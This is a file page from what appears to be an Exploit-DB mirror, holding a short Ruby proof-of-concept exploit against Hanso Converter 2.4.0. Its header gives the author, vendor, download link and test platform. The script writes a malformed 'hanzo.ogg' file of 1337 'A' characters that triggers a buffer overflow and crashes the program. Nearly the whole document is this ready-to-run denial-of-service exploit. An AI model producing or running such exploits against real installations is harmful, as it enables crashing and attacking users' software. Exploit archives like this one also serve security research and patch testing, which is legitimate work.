exploit-db-mirror/exploits/windows/dos/29545.rb
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

15 lines
No EOL
405 B
Ruby
Executable file

#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Converter 2.4.0 Buffer Overflow(DoS)
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-converter-setup.exe
# version: 2.4.0
# Tested on: windows XP sp2
DENEME = "A" * 1337
File.open('hanzo.ogg', 'w') do |bofdosya|
bofdosya.puts (DENEME)
bofdosya.close()
end